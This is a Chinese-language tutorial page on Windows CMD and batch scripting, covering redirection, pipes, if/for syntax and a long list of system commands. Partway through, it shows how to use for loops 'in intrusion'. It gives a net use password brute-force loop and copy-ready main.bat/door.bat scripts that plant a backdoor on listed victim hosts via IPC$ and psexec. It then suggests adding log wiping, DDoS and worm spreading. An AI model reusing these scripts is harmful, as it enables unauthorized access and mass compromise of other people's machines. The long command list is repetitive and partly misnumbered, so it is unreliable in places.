Home
ProgramLanguage
DataBase
Err Window Line MEGA SEO IDE Media Google UnixTimestamp Virus
Office
OperatingSystem
MultimediaDesign
Adobe
Photoshop
Illustrator
Corel
DRAW
Painter
PaintShop
會聲會影
Pinta
GIMP
Krita Desktop
Inkscape
Arduino
開啟命令提示字元的幾種方法:
1.開始 > 搜尋程式及檔案中輸入 CMD > Enter
2.Windows 鍵 + R 再輸入 CMD > Enter
3.檔案總管 > 位置列輸入 CMD > Enter
4.C:\Windows\system32\cmd.exe

建立 CMD 命令檔
1.開啟記事本
2.將指令打入
3.將檔案另存
4.副檔名.cmd
5.存檔類型改為 "所有類型"


將結果寫到檔案(可以用 start 指令開啟)
ping 192.168.6.1 > D:\ping.txt

mode con cp select=950


CD 顯示目前目錄或變更目錄
DEL 刪除一個或多個檔案
MD 建立目錄
RD 刪除目錄
START 開啟資料夾或檔案
copy
xcopy

IPCONFIG
PING
TRACERT
arp
nbtstat
net

SHUTDOWN 電腦關機、重新啟動
LOGOFF 登出

TIME 顯示或設定系統時間
DATE 顯示或設定系統日期

ECHO
GOTO 在批次程式中建立迴圈
CALL 呼叫另一個程式
PAUSE 暫停執行批次程式

TITLE 更改命令提示字元標題
color 更改命令提示字元 背景顏色 與 文字顏色


set/p cho="Please input computer name:"

&
&&
||

************************************************
>、>>
說明:將輸出結果儲存到特定檔案
> 與 >> 區別在於:>會清除預計寫入檔案中的內容在寫入,>>只會將內容追加到檔案尾部

例如:
echo Hello word > Hello.txt
跟
echo Hello word >> Hello.txt
各執行兩次後再去開啟 Hello.txt , 就會發現 > 只有一行 Hello word,而 >> 有兩行。

例如:
dir %windir%\system32\*.exe > exe.txt
dir %windir%\system32\*.dll > d:\dll.txt
將 system32 下 *.exe 跟 *.dll 的檔案作紀錄,可以隨時作比對看看,是否有不正常的檔案增加



************************************************

@ 不顯示該行指令
:
:: 註解
REM 註解

%0 表示批次檔,%1表示第一個參數,可到255
echo %0
echo %1

| 串流輸出,把前面程式的結果給後面的程式
Dir | Sort > t.txt 
REM Dir 列出目錄 透過 | 給 Sort 將結果存到 t.txt
Dir | Find "t.txt" > t.txt
REM Dir 列出目錄 透過 | 給 Find 找出包含 t.txt 的檔案 將結果存到 t.txt

type t.txt
REM 列出 t.txt 的內容

PAUSE
REM 暫停

choice 讓用戶輸入一個字元
	:menu
	choice /c:123 /m "1.END,2.goo,3.MENU"
	if errorlevel 3 goto menu
	if errorlevel 2 goto goo
	if errorlevel 1 goto end
	:goo
	echo "goo"
	:end
	echo "Goodbye"


if 判斷是否符合規定條件,從而決定執行不同命令
if [not] errorlevel number command
if [not] string1==string2 command
if [not] exist filename command
例 1:if errorlevel 2 goto x2
作用:如果返回碼等於2,程式則跳轉到標籤為x2的行執行。
備註:DOS程式執行時會返回一個數字,即errorlevel,稱為錯誤碼或返回碼,常見的返回碼為0、1。
例 2:if 「%1」==」a」 format a:
作用:如果參數為a,則格式化A盤。
例 3:if not exist config.sys echo 檔案不存在
作用:如果檔案config.sys不存在,則顯示「檔案不存在」。


for
說明:在指定的範圍內循環執行指令。
備註:在批處理檔案中使用 for 指令時,指定變數請使用 %%variable,而不要用 %variable。
用法:for {%variable|%%variable} in (set) do command [command-parameters]
參數:%variable 變數。只能是單一字母,分大小寫和全局,所以 %i 不同於 %I。
(set)     一個或一組檔案。可以使用萬用字元。
command  對每個檔案執行的指令。
command-parameters   指令行開關。

帶指令行開關的 for 指令:

用法:for /d %variable in (set) do command [command-parameters]
說明:如果集中包含萬用字元,則指定與目錄名核對,而不與檔案名稱核對。(directory)
例 1:for /d %i in (*) do @echo %i
作用:枚舉目前目錄下的子目錄名。
例 2:for /d %i in (*g*) do @echo %i
作用:枚舉目前目錄下的子目錄名含g的名稱。

用法:for /r [[drive:]path] %variable in (set) do command [command-parameters]
說明:檢查以 [drive:]path 為根的目錄樹。如果在 /r 後沒有指定目錄,則使用目前目錄。如果集僅為一個單點(.)字元,則枚舉該目錄樹。 (root)
例 3:for /r %i in (.) do @echo %i
作用:枚舉目前目錄下的全部子目錄名路徑。
例 4:for /r %i in (*) do @echo %i
作用:枚舉目前目錄及子目錄下的全部檔案名稱路徑。

用法:for /l %variable in (start,step,end) do command [command-parameters]
說明:以增量形式從開始到結束一個數字序列。(list)

例 5:for /l %i in (1,1,5) do @echo %i
作用:產生序列 1 2 3 4 5。
例 6:for /l %i in (5,-1,1) do @echo %i
作用:產生序列 5 4 3 2 1。

用法:for /f ["options"] %variable in (file-set) do command [command-parameters]
for /f ["options"] %variable in ("string") do command [command-parameters]
for /f ["options"] %variable in ('command') do command [command-parameters]
說明:file-set為一個或多個檔案名稱。/f 分析每個檔案的每一行,跳過空白行。"options" 關鍵字:
        eol=c           - 行註解字元的結尾(就一個)
        skip=n          - 在檔案開始時略過的行數。
        delims=xxx      - 分隔符集。取代空格和跳格鍵的預設分隔符集。
        tokens=x,y,m-n   - 每行的哪一個符號被傳遞到每個迭代的 for 本身。
                          這會導致額外變數名稱的分配。m-n格式為一個範圍。
                          透過 nth 符號指定 mth。如果符號字串中的最後一個字元星號,
                          那麼額外的變數將在最後一個符號解析之後分配並接受行的保留文字。
        usebackq                          
                          在作為指令執行一個後引號的字串並且一個單
                          引號字元為文字字串指令並允許在 filenameset
                          中使用雙引號擴起檔案名稱。 
例 7:for /f "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
作用:分析 myfile.txt 中的不以分號開頭(eol=;)的行,將每行按逗號和空格分成幾段(delims=; ),再將每行的第2段、第3段及第3段以後的剩餘段分別賦值給變數%i、%j、%k。對於帶有空格的檔案名稱,需要用雙引號將檔案名稱括起來。

透過 tokens= 最多可以指定 26 個符號,for變數最多可以同時使用52個 。
在相鄰字串上可以使用 for /f 分析邏輯;方法是,用單引號將括號之間的 file-set 括起來。這樣,該字串會被當作一個檔案中的一個單一輸入行。
最後,您可以用 for /f 指令來分析指令的輸出。方法是,將括號之間的 file-set 變成一個反括字串(Esc鍵下面的按鍵)。該字串會被當作指令行,傳遞到一個子 cmd.exe,其輸出會被抓進記憶體,並被當作檔案分析。

例 8:for /f "usebackq delims==" %i in (`set`) do @echo %i 
作用:枚舉目前環境中的環境變數名稱。

下面我們舉幾個例子來具體說明一下for指令在入侵中的用途。

例 9:for /f %%i in (dict.txt) do net use \\ip\ipc$>D:\ok.txt
分析:利用for指令來實現對一台目標winnt主機的暴力密碼破解。我們用net use指令嘗試和目標主機進行連接,當成功時記下密碼。用%i來表示administrator的密碼,%i的值在dict.txt中取得,然後將程式運行結果傳遞給find指令,ok.txt中的值即為目標主機的密碼。

例10:for /f 「tokens=1,2,3 delims= 」 %%i in (victim.txt) do start call door.bat %%i %%j %%k
分析:自動給大量肉雞種後門和木馬。該指令按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。 
而cultivate.bat無非就是用net use指令來建立ipc$連接,並copy木馬+後門到victim,然後用返回碼(if errorlever =)來過濾器成功種植後門的主機,並echo出來,或者echo到指定的檔案。 
delims= 表示vivtim.txt中的內容是一空格來分隔的。所以victim.txt裡的內容應該根據%%i %%j %%k表示的對象來排列,一般就是「IP位址 密碼 帳號」。

代碼雛形: 
========================= 從這裡開始複製,儲存為main.bat =========================
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
@goto end 
:usage 
@echo 執行此批處理檔案
:end
========================= 到這裡結束複製,儲存為main.bat =========================

========================= 從這裡開始複製,儲存為door.bat =========================
@net use \\%1\ipc$ %3 /user:"%2" 
@if errorlevel 1 goto failed 
@echo 嘗試建立 IPC$ 連接 ………… 成功
@copy windrv32.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ok.txt 
@psexec \\%1 c:\windows\system32\windrv32.exe 
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 後門>>ok.txt 
:failed 
@echo 不能連線到此主機 
========================= 到這裡結束複製,儲存為door.bat =========================

這只是一個自動種植後門批處理的雛形,兩個批處理和後門程式(Windrv32.exe,PSexec.exe)需放在同一目錄下。批處理內容尚可擴充,例如:加入清除日誌和DDOS的功能,加入定時新增用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲)。此處不多做敘述,有興趣的朋友可自行研究。






java的Runtime.getRuntime().exec(commandStr)可以调用执行cmd指令。

cmd /c dir 是执行完dir命令后关闭命令窗口。

cmd /k dir 是执行完dir命令后不关闭命令窗口。

cmd /c start dir 会打开一个新窗口后执行dir指令,原窗口会关闭。

cmd /k start dir 会打开一个新窗口后执行dir指令,原窗口不会关闭。

可以用cmd /?查看帮助信息。

★CMD命令★
1. gpedit.msc-----组策略 
2. sndrec32-------录音机 
3. Nslookup-------IP地址侦测器 
4. explorer-------打开资源管理器 
5. logoff---------注销命令 
6. tsshutdn-------60秒倒计时关机命令 
7. lusrmgr.msc----本机用户和组 
8. services.msc---本地服务设置 
9. oobe/msoobe /a----检查XP是否激活 
10. notepad--------打开记事本 
11. cleanmgr-------垃圾整理 
12. net start messenger----开始信使服务 
13. compmgmt.msc---计算机管理 
14. net stop messenger-----停止信使服务 
15. conf-----------启动netmeeting 
16. dvdplay--------DVD播放器 
17. charmap--------启动字符映射表 
18. diskmgmt.msc---磁盘管理实用程序 
19. calc-----------启动计算器 
20. dfrg.msc-------磁盘碎片整理程序 
21. chkdsk.exe-----Chkdsk磁盘检查 
22. devmgmt.msc--- 设备管理器 
23. regsvr32 /u *.dll----停止dll文件运行 
24. drwtsn32------ 系统医生 
25. rononce -p ----15秒关机 
26. dxdiag---------检查DirectX信息 
27. regedt32-------注册表编辑器 
28. Msconfig.exe---系统配置实用程序 
29. rsop.msc-------组策略结果集 
30. mem.exe--------显示内存使用情况 
31. regedit.exe----注册表 
32. winchat--------XP自带局域网聊天 
33. progman--------程序管理器 
34. winmsd---------系统信息 
35. perfmon.msc----计算机性能监测程序 
2. 36. winver---------检查Windows版本 
37. sfc /scannow-----扫描错误并复原 
38. taskmgr-----任务管理器(2000/xp/2003 
39. winver---------检查Windows版本 
40. wmimgmt.msc----打开windows管理体系结构(WMI) 
41. wupdmgr--------windows更新程序 
42. wscript--------windows脚本宿主设置 
43. write----------写字板 
44. winmsd---------系统信息 
45. wiaacmgr-------扫描仪和照相机向导 
46. winchat--------XP自带局域网聊天 
47. mem.exe--------显示内存使用情况 
48. Msconfig.exe---系统配置实用程序 
49. mplayer2-------简易widnows media player 
50. mspaint--------画图板 
51. mstsc----------远程桌面连接 
52. mplayer2-------媒体播放机 
53. magnify--------放大镜实用程序 
54. mmc------------打开控制台 
55. mobsync--------同步命令 
56. dxdiag---------检查DirectX信息 
57. drwtsn32------ 系统医生 
58. devmgmt.msc--- 设备管理器 
59. dfrg.msc-------磁盘碎片整理程序 
60. diskmgmt.msc---磁盘管理实用程序 
61. dcomcnfg-------打开系统组件服务 
62. ddeshare-------打开DDE共享设置 
63. dvdplay--------DVD播放器 
64. net stop messenger-----停止信使服务 
65. net start messenger----开始信使服务 
66. notepad--------打开记事本 
67. nslookup-------网络管理的工具向导 
68. ntbackup-------系统备份和还原 
69. narrator-------屏幕“讲述人” 
70. ntmsmgr.msc----移动存储管理器 
71. ntmsoprq.msc---移动存储管理员操作请求 
72. netstat -an----(TC)命令检查接口 
73. syncapp--------创建一个公文包 
74. sysedit--------系统配置编辑器 
75. sigverif-------文件签名验证程序 
76. sndrec32-------录音机 
77. shrpubw--------创建共享文件夹 
78. secpol.msc-----本地安全策略 
79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 
80. services.msc---本地服务设置 
81. Sndvol32-------音量控制程序 
82. sfc.exe--------系统文件检查器 
83. sfc /scannow---windows文件保护 
84. tsshutdn-------60秒倒计时关机命令 
3. 84. tsshutdn-------60秒倒计时关机命令 
85. tourstart------xp简介(安装完成后出现的漫游xp程序) 
86. taskmgr--------任务管理器 
87. eventvwr-------事件查看器 
88. eudcedit-------造字程序 
89. explorer-------打开资源管理器 
90. packager-------对象包装程序 
91. perfmon.msc----计算机性能监测程序 
92. progman--------程序管理器 
93. regedit.exe----注册表 
94. rsop.msc-------组策略结果集 
95. regedt32-------注册表编辑器 
96. rononce -p ----15秒关机 
97. regsvr32 /u *.dll----停止dll文件运行 
98. regsvr32 /u zipfldr.dll------取消ZIP支持 
99. cmd.exe--------CMD命令提示符 
100. chkdsk.exe-----Chkdsk磁盘检查 
101. certmgr.msc----证书管理实用程序 
102. calc-----------启动计算器 
103. charmap--------启动字符映射表 
104. cliconfg-------SQL SERVER 客户端网络实用程序 
105. Clipbrd--------剪贴板查看器 
106. conf-----------启动netmeeting 
107. compmgmt.msc---计算机管理 
108. cleanmgr-------垃圾整理 
109. ciadv.msc------索引服务程序 
110. osk------------打开屏幕键盘 
111. odbcad32-------ODBC数据源管理器 
112. oobe/msoobe /a----检查XP是否激活 
113. lusrmgr.msc----本机用户和组 
114. logoff---------注销命令 
115. iexpress-------木马捆绑工具,系统自带 
116. Nslookup-------IP地址侦测器 
117. fsmgmt.msc-----共享文件夹管理器 
118. utilman--------辅助工具管理器 
119. gpedit.msc-----组策略
120. explorer-------打开资源管理器

范例:磁盘双击打不开的

处理方法:

cmd /c reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f
 cmd /k reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f

cmd k reg delete "HKEY_CLASSES_ROOT\Drive\shell\run" /f
 cmd /k reg delete "HKEY_CLASSES_ROOT\Drive\shell\run" /f







| 關於我們 | 聯絡我們 | 更新記錄 |
版權所有 轉載必究 服務專線: